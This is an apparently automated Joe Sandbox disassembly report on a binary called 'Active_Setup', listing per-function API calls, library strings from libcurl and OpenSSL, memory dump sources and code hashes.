• Opcode Fuzzy Hash: 88ab23e106b1ecdc887b5fdd706753d5730cdb0d500ec535e9ef9e9b9cb7f12e
• Instruction Fuzzy Hash: 5CD0A9309883009ADB242771B80E7093E907BD0A02F108808F5C9D8C89CBAD00284B00
Control-flow Graph
control_flow_graph 2626 98f4f7-98f50a 2627 98f50c-98f50f 2626->2627 2628 98f522-98f52c 2626->2628 2629 98f511-98f514 2627->2629 2630 98f53b-98f547 2628->2630 2631 98f52e-98f536 2628->2631 2629->2628 2633 98f516-98f520 2629->2633 2632 98f54a-98f54f 2630->2632 2631->2630 2634 98f551-98f55c 2632->2634 2635 98f582-98f589 LoadLibraryA 2632->2635 2633->2628 2633->2629 2636 98f578-98f57c 2634->2636 2637 98f55e-98f576 call 98fbc5 2634->2637 2638 98f58c-98f590 2635->2638 2636->2632 2640 98f57e-98f580 2636->2640 2637->2636 2642 98f591-98f593 2637->2642 2640->2635 2640->2638 2642->2638
APIs
• LoadLibraryA.KERNEL32(00000000,?,?), ref: 0098F589
Strings
Memory Dump Source
• Source File: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_Active_Setup.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: .dll
• API String ID: 1029625771-2738580789
• Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
• Instruction ID: 3eb32ef8cbf17067808e0bf9f44fef0784ff9c571ce257850f657f07716492a2
• Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
• Instruction Fuzzy Hash: 622129766002859FEB21EF6CD894B7A7BA8BF05320F18517DE842CBB41D730EC458B90
Control-flow Graph
control_flow_graph 2643 109e3b0-109e3d9 CreateMutexW GetLastError call 1080748 2645 109e3de-109e3df 2643->2645
APIs
• CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0109E3B6
• GetLastError.KERNEL32 ref: 0109E3C1
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: CreateErrorLastMutex
• String ID:
• API String ID: 1925916568-0
• Opcode ID: 2285ed173ec3377dbe3f831fd2f707355c3b10832c8a8bb62f67a9ff94c0e9f3
• Instruction ID: b7f1182762a66239ab74621c64110ae34b698dd3b55352433d42f0fa9da658b1
• Opcode Fuzzy Hash: 2285ed173ec3377dbe3f831fd2f707355c3b10832c8a8bb62f67a9ff94c0e9f3
• Instruction Fuzzy Hash: C3D02230589300D6EB202730A80F7083E9477C0711F200408F6CDC88C8CA6D01984745
APIs
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0098E1C3
• VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 0098E507
Memory Dump Source
• Source File: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_Active_Setup.jbxd
Yara matches
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
• Instruction ID: ceff99b069523a280b121bd51ec9372e84b259d387754d6b7d0862d00be6cfb9
• Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
• Instruction Fuzzy Hash: ABB1C332500B06EBDB21BE70CCA4BA7B7ACFF49310F140929F95992361E735E950DBA1
APIs
• HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0108B85A
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: fa0ab535a0ba9b7aebcde72b045384edf47ed36bdde4be5095b3e3398d63f5d3
• Instruction ID: 14c58c4dad881aedb1ccbae243236da1e31e581cd118b9644cb4e0ca828ef997
• Opcode Fuzzy Hash: fa0ab535a0ba9b7aebcde72b045384edf47ed36bdde4be5095b3e3398d63f5d3
• Instruction Fuzzy Hash: E2D05E725A47459EDB209E75A80A7373BDCD384A95F10447AB88CC6594E97AC581C640
APIs
• curl_maprintf.ACTIVE_SETUP(Referer: %s,?), ref: 00FCC31A
• curl_maprintf.ACTIVE_SETUP(Accept-Encoding: %s,?), ref: 00FCC3AE
  • Part of subcall function 00FC1180: curl_mvsnprintf.ACTIVE_SETUP(00FB8A4C,00004000,tP8g,tP8g,tP8g,00000000,00FC9C63,tP8g,Callback aborted), ref: 00FC119C
  • Part of subcall function 00FC1180: curl_msnprintf.ACTIVE_SETUP(8904C483,00000100,0109FC00,00FB8A4C), ref: 00FC11C3
Strings
Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_maprintf$curl_msnprintfcurl_mvsnprintf
                                                                                                                                                  • String ID: %s $%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s$%s%s$%s%s=%s$%x$0$100-continue$;type=$;type=%c$Accept-Encoding:$Accept-Encoding: %s$Accept:$Chunky upload is not supported by HTTP 1.0$Content-Length:$Content-Length: %lld$Content-Length: 0$Content-Range:$Content-Range: bytes %s%lld/%lld$Content-Range: bytes %s/%lld$Content-Range: bytes 0-%lld/%lld$Content-Type:$Content-Type: application/x-www-form-urlencoded$Cookie:$Cookie: $Could not get Content-Type header line!$Could not seek stream$Could only read %lld bytes from the input$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request$File already completely uploaded$GET$HEAD$Host:$Host: %s%s%s$Host: %s%s%s:%hu$Internal HTTP POST error!$POST$PUT$Proxy-Connection:$Range:$Range: bytes=%s$Referer:$Referer: %s$Transfer-Encoding:$User-Agent:$chunked$ftp://$ftp://%s:%s@%s$upload completely sent off: %lld out of %lld bytes
                                                                                                                                                  • API String ID: 2113644472-3410303182
                                                                                                                                                  • Opcode ID: 5cc662320fb1889ba3c38ff6493382dd66995382d860dcf2b4ff6ea376d8f970
                                                                                                                                                  • Instruction ID: 1b98791baf073dd7d8dad76734f1646cd9ad357129f2848cb8792a24d8f8c1f0
                                                                                                                                                  • Opcode Fuzzy Hash: 5cc662320fb1889ba3c38ff6493382dd66995382d860dcf2b4ff6ea376d8f970
                                                                                                                                                  • Instruction Fuzzy Hash: 18D2E1B0A04706ABD724DF65DE83FABB3E4BF44714F04452DF89986242E735E904EB92
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___getlocaleinfo
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1937885557-0
                                                                                                                                                  • Opcode ID: 69786802775a037008fa8b90e051e8bf2173fbc0c81340c904b174da4d8c873d
                                                                                                                                                  • Instruction ID: f4f3b79262d6901740f0c34cbcf815bcb5f5a373fa8478cc4068dfe45d1e30c7
                                                                                                                                                  • Opcode Fuzzy Hash: 69786802775a037008fa8b90e051e8bf2173fbc0c81340c904b174da4d8c873d
                                                                                                                                                  • Instruction Fuzzy Hash: 10E1C3B290420EBEEF12DAE1CC44DFF7BBDFB18758F04052AF295D2050EA75AA159760
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 00FC32ED
                                                                                                                                                  • Bind to local port %hu failed, trying next, xrefs: 00FC33B9
                                                                                                                                                  • Local Interface %s is ip %s using address family %i, xrefs: 00FC31F2
                                                                                                                                                  • Couldn't bind to '%s', xrefs: 00FC333B
                                                                                                                                                  • Local port: %hu, xrefs: 00FC345A
                                                                                                                                                  • getsockname() failed with errno %d: %s, xrefs: 00FC344D
                                                                                                                                                  • bind failed with errno %d: %s, xrefs: 00FC3495
                                                                                                                                                  • Couldn't bind to interface '%s', xrefs: 00FC324C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset_strncmp$bindhtons
                                                                                                                                                  • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s
                                                                                                                                                  • API String ID: 599106724-2769131373
                                                                                                                                                  • Opcode ID: f42c08dad6c36dc9418afbd5a77ca68e2a4a74127053969715abef7fa549d611
                                                                                                                                                  • Instruction ID: 0bb0c17df72ca2042f154911e5df7bf2b20d9a0828675c0ff666ad6265cb06f7
                                                                                                                                                  • Opcode Fuzzy Hash: f42c08dad6c36dc9418afbd5a77ca68e2a4a74127053969715abef7fa549d611
                                                                                                                                                  • Instruction Fuzzy Hash: C5B1B471508342AFC720DB14DD96FAB7BE8EF99794F04851CF88987201EA35DA05DBA2
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 0105297D
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 010529CB
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 010529D4
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 01052A17
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 01052A21
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 01052A35
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryProc$Free$Load
                                                                                                                                                  • String ID: .\crypto\dso\dso_win32.c$CreateToolhelp32Snapshot$KERNEL32.DLL$Module32First$Module32Next
                                                                                                                                                  • API String ID: 3262421712-1549069882
                                                                                                                                                  • Opcode ID: bfb494cb6b9f3c11c1686c112a451444fd0d297560746d037de7b379672a96e2
                                                                                                                                                  • Instruction ID: b576dee9f4b1550352b6ee810a1cbd8d57f761f7ab2fe749f3008295836eacf8
                                                                                                                                                  • Opcode Fuzzy Hash: bfb494cb6b9f3c11c1686c112a451444fd0d297560746d037de7b379672a96e2
                                                                                                                                                  • Instruction Fuzzy Hash: 4C412431604342ABD370AB69DC8AFAF77E9BF89750F040219F9C5D62C0EBB99104C796
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 010748BC
                                                                                                                                                    • Part of subcall function 00FE9B40: _raise.LIBCMT ref: 00FE9B5B
                                                                                                                                                    • Part of subcall function 00FE3D90: _memset.LIBCMT ref: 00FE3D9A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: _memset$_raise
• String ID: .\ssl\s3_cbc.c$0$0$data_plus_mac_plus_padding_size < 1024 * 1024$j$mac_secret_length <= sizeof(hmac_pad)
• API String ID: 1505022616-3721666550
• Opcode ID: fef1ba0f98e3c570371ae65f80ad8fa8993e7187853e84467c9d5011919be5ed
• Instruction ID: c0bcf513c142f59d2ce65c5c9f6788d7d8e85e344863a416a4904dca2739c9bb
• Opcode Fuzzy Hash: fef1ba0f98e3c570371ae65f80ad8fa8993e7187853e84467c9d5011919be5ed
• Instruction Fuzzy Hash: AE32BF719083859BD325DF68C884BEFBBE9AFC5304F48491DE5C9C7202E675DA08CB96
APIs
• _swscanf.LIBCMT ref: 00FD40D7
  • Part of subcall function 0108174B: _vscan_fn.LIBCMT ref: 01081762
• _swscanf.LIBCMT ref: 00FD4178
• _swscanf.LIBCMT ref: 00FD41A3
• GetLastError.KERNEL32(?,00000000), ref: 00FD41C2
• SetLastError.KERNEL32(00000000,?,00000000), ref: 00FD41C8
• __wcstoi64.LIBCMT ref: 00FD41D6
• GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00FD41E0
• SetLastError.KERNEL32(00000000,?,?,?,?,00000000), ref: 00FD41E9
Strings
• %31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz], xrefs: 00FD40A7
• %02d:%02d:%02d, xrefs: 00FD4172
• %02d:%02d, xrefs: 00FD419D
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: ErrorLast$_swscanf$__wcstoi64_vscan_fn
• String ID: %02d:%02d$%02d:%02d:%02d$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]
• API String ID: 1467486151-241090727
• Opcode ID: 9f1ac67f0f08d461d797b152342c00df848e9ae2b62492594e43b232e48e35da
• Instruction ID: b84b3c6be4deccd58c1b5db74b9047ffe8e0adb9616d47bf812036e4b7873e74
• Opcode Fuzzy Hash: 9f1ac67f0f08d461d797b152342c00df848e9ae2b62492594e43b232e48e35da
• Instruction Fuzzy Hash: 73D18FB1E083418FC714DF68D84062EBBE2AFD5720F584A2FF59587340E775E984AB92
APIs
• GetLastError.KERNEL32(?,00000000,?,00FC127B,?,00000000), ref: 00FC64B3
• _strerror.LIBCMT ref: 00FC64DF
  • Part of subcall function 01083179: __getptd_noexit.LIBCMT ref: 01083180
• _strncpy.LIBCMT ref: 00FC64E9
• FormatMessageA.KERNEL32(00001000,00000000,?,00000000,?,000000FF,00000000), ref: 00FC6514
• curl_msnprintf.ACTIVE_SETUP(?,000000FF,Unknown error %d (%#x),?,?), ref: 00FC652B
• _strrchr.LIBCMT ref: 00FC653D
• _strrchr.LIBCMT ref: 00FC6558
• GetLastError.KERNEL32 ref: 00FC6570
• SetLastError.KERNEL32(00000000), ref: 00FC657B
Strings
Similarity
• API ID: ErrorLast$_strrchr$FormatMessage__getptd_noexit_strerror_strncpycurl_msnprintf
• String ID: Unknown error %d (%#x)
• API String ID: 2726039267-2414550090
• Opcode ID: 33b03fc60e85397e4c8d898379fa147701caaaf31fd06ae3fa47eaa91554b0c5
• Instruction ID: dda67e26d2ab86e3e0cee60b762b3b0fd7ab3dfe359b4495a421a26b5d2faf9f
• Opcode Fuzzy Hash: 33b03fc60e85397e4c8d898379fa147701caaaf31fd06ae3fa47eaa91554b0c5
• Instruction Fuzzy Hash: DF1129B0B483432EEB213674AD46F7B36DC9F61795F180438F985D618AFA69CD0152B2
APIs
• _memset.LIBCMT ref: 00FD6633
• curl_msnprintf.ACTIVE_SETUP(?,00000400,010A48F8,00000000,00000000,00000000,00000000,00000018,00000000,00000018,00000000,00000040,00000000,00000000,00000000,00000018), ref: 00FD691B
  • Part of subcall function 00FC4DC0: curl_mvsnprintf.ACTIVE_SETUP(00000000,00000000,?,?,00FC108A,?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC4DD4
Strings
• gethostname() failed, continuing without!, xrefs: 00FD66BC
• NTLM, xrefs: 00FD65FE
• user + domain + host name too big, xrefs: 00FD69E0
Similarity
• API ID: _memsetcurl_msnprintfcurl_mvsnprintf
• String ID: NTLM$gethostname() failed, continuing without!$user + domain + host name too big
• API String ID: 433933079-4124566065
• Opcode ID: b79f3c27c29a67c6d83bbba59c3f88dd4a101a38bd1e7abff3a24babff4727b6
• Instruction ID: 500652bd839326b6961e7c586fd0589913c6b7d21989d88bda19c5f02ef08e4a
• Opcode Fuzzy Hash: b79f3c27c29a67c6d83bbba59c3f88dd4a101a38bd1e7abff3a24babff4727b6
• Instruction Fuzzy Hash: CBE16DB15083419FD320DF54D881FABB7E9BBC8704F18892EF6C997381DA74A505DB52
APIs
• IsDebuggerPresent.KERNEL32 ref: 01086202
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01086217
• UnhandledExceptionFilter.KERNEL32(010D8A88), ref: 01086222
• GetCurrentProcess.KERNEL32(C0000409), ref: 0108623E
• TerminateProcess.KERNEL32(00000000), ref: 01086245
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: 78357d5216619627359be72251cccd71c3ff59f7a3acfd6fe2fcaa2065fd0d40
• Instruction ID: e1ed0b832f0d00f48f824ec338e289a9e3909418d696ee5171ba1c1bc17aff51
• Opcode Fuzzy Hash: 78357d5216619627359be72251cccd71c3ff59f7a3acfd6fe2fcaa2065fd0d40
• Instruction Fuzzy Hash: 9221F3BC9052058FC7A0DF99F08668A3BF0BB08320F91012EEDC8C7B58E7BA55818F45
APIs
Strings
Similarity
• API ID: _memset
• String ID: 6
• API String ID: 2102423945-498629140
• Opcode ID: 142137b1f40abc06a3aa8b1660f041e04a16be247786f63137a9e5557f2fb12a
• Instruction ID: d34bfacf522541d53bc8054a5b141c6e09b05355b2124f8b111d989b3fffc839
• Opcode Fuzzy Hash: 142137b1f40abc06a3aa8b1660f041e04a16be247786f63137a9e5557f2fb12a
• Instruction Fuzzy Hash: 98A1C072A0C3859FD721DB78C880AEFBBE9AFC5200F444E5DF5D987201D6349A09CB96
APIs
• _memset.LIBCMT ref: 010741CA
  • Part of subcall function 00FE9B40: _raise.LIBCMT ref: 00FE9B5B
Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset_raise
                                                                                                                                                  • String ID: .\ssl\s3_cbc.c$md_size <= EVP_MAX_MD_SIZE$orig_len >= md_size
                                                                                                                                                  • API String ID: 1484197835-1657088310
                                                                                                                                                  • Opcode ID: 6730895f8603f8ca26534dc6539f4d46e6c1aa300fbe8021b33dbde7eb58222c
                                                                                                                                                  • Instruction ID: 61500d39607ca17cae07011407eb99367811d547a0b0d075d0d2d15b7ac05a4c
                                                                                                                                                  • Opcode Fuzzy Hash: 6730895f8603f8ca26534dc6539f4d46e6c1aa300fbe8021b33dbde7eb58222c
                                                                                                                                                  • Instruction Fuzzy Hash: E151B175B083424FC714DE29D88169BFBE2BBD9200F544A2DE5C9CB342DA70D90ACB96
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
